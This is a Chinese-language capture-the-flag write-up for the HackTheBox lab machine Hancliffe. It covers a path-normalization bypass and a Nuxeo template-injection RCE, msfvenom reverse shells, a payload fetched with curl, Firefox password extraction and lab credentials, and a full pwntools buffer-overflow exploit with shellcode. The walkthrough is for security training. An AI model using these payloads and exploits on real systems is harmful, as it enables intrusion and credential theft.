Hancliffe - HackTheBox

基本信息

• https://www.hackthebox.com/home/machines/profile/388
• 10.10.11.115

端口扫描

80，8000，9999:

nmap -sC -sV 10.10.11.115
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 13:35 CST
Nmap scan report for 10.10.11.115
Host is up (0.086s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.21.0
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.21.0
8000/tcp open  http    nginx 1.21.0
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: HashPass | Open Source Stateless Password Manager
|_http-server-header: nginx/1.21.0
9999/tcp open  abyss?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Welcome Brankas Application.
|     Username: Password:
|   NULL:
|     Welcome Brankas Application.
|_    Username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.92%I=7%D=3/7%Time=622599EF%P=x86_64-apple-darwin20.4.0
SF:%r(NULL,27,"Welcome\x20Brankas\x20Application\.\nUsername:\x20")%r(GetR
SF:equest,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\
SF:x20")%r(HTTPOptions,31,"Welcome\x20Brankas\x20Application\.\nUsername:\
SF:x20Password:\x20")%r(FourOhFourRequest,31,"Welcome\x20Brankas\x20Applic
SF:ation\.\nUsername:\x20Password:\x20")%r(JavaRMI,31,"Welcome\x20Brankas\
SF:x20Application\.\nUsername:\x20Password:\x20")%r(GenericLines,31,"Welco
SF:me\x20Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(RTSPRequ
SF:est,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\x20
SF:")%r(RPCCheck,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Pas
SF:sword:\x20")%r(DNSVersionBindReqTCP,31,"Welcome\x20Brankas\x20Applicati
SF:on\.\nUsername:\x20Password:\x20")%r(DNSStatusRequestTCP,31,"Welcome\x2
SF:0Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(Help,31,"Welc
SF:ome\x20Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(SSLSess
SF:ionReq,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\
SF:x20")%r(TerminalServerCookie,31,"Welcome\x20Brankas\x20Application\.\nU
SF:sername:\x20Password:\x20")%r(TLSSessionReq,31,"Welcome\x20Brankas\x20A
SF:pplication\.\nUsername:\x20Password:\x20")%r(Kerberos,31,"Welcome\x20Br
SF:ankas\x20Application\.\nUsername:\x20Password:\x20")%r(SMBProgNeg,31,"W
SF:elcome\x20Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(X11P
SF:robe,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\x2
SF:0")%r(LPDString,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20P
SF:assword:\x20")%r(LDAPSearchReq,31,"Welcome\x20Brankas\x20Application\.\
SF:nUsername:\x20Password:\x20")%r(LDAPBindReq,31,"Welcome\x20Brankas\x20A
SF:pplication\.\nUsername:\x20Password:\x20")%r(SIPOptions,31,"Welcome\x20
SF:Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(LANDesk-RC,31,
SF:"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(Te
SF:rminalServer,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Pass
SF:word:\x20")%r(NCP,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x2
SF:0Password:\x20")%r(NotesRPC,31,"Welcome\x20Brankas\x20Application\.\nUs
SF:ername:\x20Password:\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.08 seconds

80

nginx默认页面：

8000

密码管理系统，使用的开源hashpass：

• scottparry/hashpass: A Stateless Password Manager written in PHP
  https://github.com/scottparry/hashpass

9999

一个自定义服务，需要用户名密码：

目录扫描

80端口目录扫描可以发现一个maintenance跳转到/nuxeo/Maintenance:

gobuster dir -u http://10.10.11.115/ -w /usr/share/dirb/wordlists/common.txt -x asp,aspx,php,html,txt -t 50

/maintenance          (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/]

但直接访问是404:

路径处理

nexeo是一个java的cms，而前端是nginx，所以可能存在路径标准化处理问题：

• https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf

/maintenance/..;/ 
会变成这个的404
nxstartup.faces

/maintenance/..;/nuxeo/nxstartup.faces
会处理到login.jsp

/maintenance/..;/nuxeo/login.jsp
会进入到nexeo的404页面

目录扫描

基于以上规则，进一步进行目录扫描：

gobuster dir -u "http://10.10.11.115/maintenance/..;" -w /usr/share/dirb/wordlists/common.txt -x jsp -t 50

/analytics            (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/analytics/]
/authentication       (Status: 401) [Size: 220]
/directory            (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/directory/]
/group                (Status: 401) [Size: 220]
/index.jsp            (Status: 302) [Size: 0] [--> http://10.10.11.115/nuxeo/nxstartup.faces]
/jsf                  (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/jsf/]
/login                (Status: 401) [Size: 220]
/logout               (Status: 401) [Size: 220]
/login.jsp            (Status: 200) [Size: 8872]
/oauth                (Status: 401) [Size: 220]
/pages                (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/pages/]
/pagination           (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/pagination/]
/resources            (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/resources/]
/scripts              (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/scripts/]
/search               (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/search/]
/tinymce              (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/tinymce/]
/ui                   (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/ui/]                                                  /user                 (Status: 401) [Size: 220]
/users                (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/users/]
/viewer               (Status: 401) [Size: 220]
/webservices          (Status: 401) [Size: 220]
/widgets              (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/widgets/]
/ws                   (Status: 401) [Size: 220]

login.jsp

根据结果，可以访问到login，底部可以看到版本号 FT 10.2 ：

http://10.10.11.115/maintenance/..;/login.jsp

nexeo

根据版本可以搜到相关漏洞：

• mpgn/CVE-2018-16341: CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
  https://github.com/mpgn/CVE-2018-16341

svc_account

修改exp中相关路径，执行，现在我们有svc_account权限：

reverse shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f exe -o msf.exe

curl http://10.10.14.15:7777/msf.exe -o /programdata/msf.exe
/programdata/msf.exe

Unified Remote 3

查看文件可以发现一个Unified Remote 3：

这个版本相关漏洞：

• Unified Remote 3.9.0.2463 - Remote Code Execution - Windows remote Exploit
  https://www.exploit-db.com/exploits/49587

exploit

端口转发出来，修改exp中下载目录，执行，获得shell：

# meterpreter
portfwd add -l 9512 -p 9512 -r 127.0.0.1

exp中 "C:\Windows\Temp" 修改为 "C:\\programdata\\"

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.15 LPORT=4445 -f exe > rev.exe
python 49587.py 127.0.0.1 10.10.14.15 rev.exe

user flag

clara桌面得到user.txt:

firefox

信息搜集可以发现clara用户存在firefox相关配置文件, 这里方便操作直接用meterpreter了：

use post/multi/gather/firefox_creds

Firepwd

(新版本winpeas会自动解出来这个密码)

使用Firepwd进行解密,得到一个development相关密码，查看用户也能看到development用户：

• lclevy/firepwd: firepwd.py, an open source tool to decrypt Mozilla protected passwords
  https://github.com/lclevy/firepwd

decrypting login/password pairs
http://localhost:8000:b'hancliffe.htb',b'#@H@ncLiff3D3velopm3ntM@st3rK3y*!'

development

使用这些信息返回8000端口，生成密码：

development
hancliffe.htb
#@H@ncLiff3D3velopm3ntM@st3rK3y*!
AMl.q2DHp?2.C/V0kNFU

winrm

查看用户相关信息的时候也可以知道development可以远程，所以winrm端口也转发出来，使用生成的密码登录成功：

portfwd add –l 5985 –p 5985 –r 127.0.0.1

devapp

devapp里可以发现一个exe，就是9999端口那个，下载下来分析：

BOF

具体分析详见0xdf博客及视频，大概就是校验用户名密码通过后进入到_SaveCreds函数，这个函数中code那里使用的strcpy，存在BOF

还涉及到几个加密算法的分析逆向

• EXE Analysis with Ghidra - Hancliffe [HackTheBox] - YouTube
  https://www.youtube.com/watch?v=r4aaNt7f-lM&ab_channel=0xdf

username = "alfiansyah";
enc_pass = "YXlYeDtsbD98eDtsWms5SyU=";
decrypted ： K3r4j@@nM4j@pAh!T

void __cdecl _SaveCreds(char *code,char *fullname)

{
  char code_copy [50];
  char *fullname_copy;
  
  fullname_copy = (char *)_malloc(100);
  _strcpy(fullname_copy,fullname);
  _strcpy(code_copy,code);
  return;
}

rot47
atbash
base64

From Base64, Atbash Cipher, ROT47 - CyberChef
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Atbash_Cipher()ROT47(47)&input=WVhsWWVEdHNiRDk4ZUR0c1dtczVTeVU9

debug

基础windows bof调试流程，本地运行，试行错误，比改版前的OSCP BOF难度要高，可能是OSED的难度，可用空间不足，0xdf的方式是跳回缓冲区开头，以及重用socket：

EIP offset 66
jmp esp p32(0x7190239f)
metasm > jmp $-70
"\xeb\xb8"

exploit.py

#!/usr/bin/env python3

from pwn import *


r = remote(args['IP'], args['PORT'])

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -b "\x00" -f python

buf =  b""
buf += b"\xb8\x23\x55\xbb\x84\xdb\xca\xd9\x74\x24\xf4\x5f\x31"
buf += b"\xc9\xb1\x52\x83\xc7\x04\x31\x47\x0e\x03\x64\x5b\x59"
buf += b"\x71\x96\x8b\x1f\x7a\x66\x4c\x40\xf2\x83\x7d\x40\x60"
buf += b"\xc0\x2e\x70\xe2\x84\xc2\xfb\xa6\x3c\x50\x89\x6e\x33"
buf += b"\xd1\x24\x49\x7a\xe2\x15\xa9\x1d\x60\x64\xfe\xfd\x59"
buf += b"\xa7\xf3\xfc\x9e\xda\xfe\xac\x77\x90\xad\x40\xf3\xec"
buf += b"\x6d\xeb\x4f\xe0\xf5\x08\x07\x03\xd7\x9f\x13\x5a\xf7"
buf += b"\x1e\xf7\xd6\xbe\x38\x14\xd2\x09\xb3\xee\xa8\x8b\x15"
buf += b"\x3f\x50\x27\x58\x8f\xa3\x39\x9d\x28\x5c\x4c\xd7\x4a"
buf += b"\xe1\x57\x2c\x30\x3d\xdd\xb6\x92\xb6\x45\x12\x22\x1a"
buf += b"\x13\xd1\x28\xd7\x57\xbd\x2c\xe6\xb4\xb6\x49\x63\x3b"
buf += b"\x18\xd8\x37\x18\xbc\x80\xec\x01\xe5\x6c\x42\x3d\xf5"
buf += b"\xce\x3b\x9b\x7e\xe2\x28\x96\xdd\x6b\x9c\x9b\xdd\x6b"
buf += b"\x8a\xac\xae\x59\x15\x07\x38\xd2\xde\x81\xbf\x15\xf5"
buf += b"\x76\x2f\xe8\xf6\x86\x66\x2f\xa2\xd6\x10\x86\xcb\xbc"
buf += b"\xe0\x27\x1e\x12\xb0\x87\xf1\xd3\x60\x68\xa2\xbb\x6a"
buf += b"\x67\x9d\xdc\x95\xad\xb6\x77\x6c\x26\xb3\x8d\x60\xb9"
buf += b"\xab\x93\x7c\xd4\x77\x1d\x9a\xbc\x97\x4b\x35\x29\x01"
buf += b"\xd6\xcd\xc8\xce\xcc\xa8\xcb\x45\xe3\x4d\x85\xad\x8e"
buf += b"\x5d\x72\x5e\xc5\x3f\xd5\x61\xf3\x57\xb9\xf0\x98\xa7"
buf += b"\xb4\xe8\x36\xf0\x91\xdf\x4e\x94\x0f\x79\xf9\x8a\xcd"
buf += b"\x1f\xc2\x0e\x0a\xdc\xcd\x8f\xdf\x58\xea\x9f\x19\x60"
buf += b"\xb6\xcb\xf5\x37\x60\xa5\xb3\xe1\xc2\x1f\x6a\x5d\x8d"
buf += b"\xf7\xeb\xad\x0e\x81\xf3\xfb\xf8\x6d\x45\x52\xbd\x92"
buf += b"\x6a\x32\x49\xeb\x96\xa2\xb6\x26\x13\xd2\xfc\x6a\x32"
buf += b"\x7b\x59\xff\x06\xe6\x5a\x2a\x44\x1f\xd9\xde\x35\xe4"
buf += b"\xc1\xab\x30\xa0\x45\x40\x49\xb9\x23\x66\xfe\xba\x61"
shellcode = buf

recv_sc = (
        # get socket descriptor in esi
        b"\x54"                       # push esp
        b"\x58"                       # pop eax
        b"\x66\x05\x49\x01"           # add ax, 0x149
        b"\x66\x2d\x01\x01"           # sub ax, 0x101
        b"\x8b\x30"                   # mov esi, dword [eax]

        # make space on stack
        b"\x83\xec\x64"               # sub esp, 0x64

        # push recv args
        b"\x31\xdb"                   # xor ebx, ebx
        b"\x53"                       # push ebx, recv flags = 0
        b"\x66\x81\xc3\x04\x04"       # add bx, 0x404
        b"\x53"                       # push ebx, size = 0x404
        b"\x54"                       # push esp
        b"\x5b"                       # pop ebx
        b"\x83\xc3\x64"               # add ebx, 0x64
        b"\x53"                       # push ebx, buffer
        b"\x56"                       # push esi, sock descriptor

        # call recv
        b"\x3e\xa1\xac\x82\x90\x71"   # mov eax, [0x719082ac]
        b"\xff\xd0"                   # call eax 
        )

payload = recv_sc + b"\x90"*(66-len(recv_sc)) + p32(0x7190239f) + b"\xeb\xb8"

r.recvuntil(b"Username: ")
r.sendline(b"alfiansyah")
r.recvuntil(b"Password: ")
r.sendline(b"K3r4j@@nM4j@pAh!T")
r.recvuntil(b"FullName: ")
r.sendline(b"0xdf")
r.recvuntil(b"Input Your Code: ")
r.sendline(payload)
time.sleep(1)
r.send(shellcode)

root flag

bof exp打到administrator：

参考资料

• scottparry/hashpass: A Stateless Password Manager written in PHP
  https://github.com/scottparry/hashpass
• https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
• mpgn/CVE-2018-16341: CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
  https://github.com/mpgn/CVE-2018-16341
• Nuxeo 认证绕过和RCE漏洞分析（CVE-2018-16341) - 斗象能力中心
  https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/
• Unified Remote 3.9.0.2463 - Remote Code Execution - Windows remote Exploit
  https://www.exploit-db.com/exploits/49587
• lclevy/firepwd: firepwd.py, an open source tool to decrypt Mozilla protected passwords
  https://github.com/lclevy/firepwd
• EXE Analysis with Ghidra - Hancliffe [HackTheBox] - YouTube
  https://www.youtube.com/watch?v=r4aaNt7f-lM&ab_channel=0xdf
• HTB: Hancliffe | 0xdf hacks stuff
  https://0xdf.gitlab.io/2022/03/05/htb-hancliffe.html
• https://www.hackthebox.com/home/machines/writeup/388
• HackTheBox - Hancliffe - YouTube
  https://www.youtube.com/watch?v=kA-bkftyyY0&ab_channel=IppSec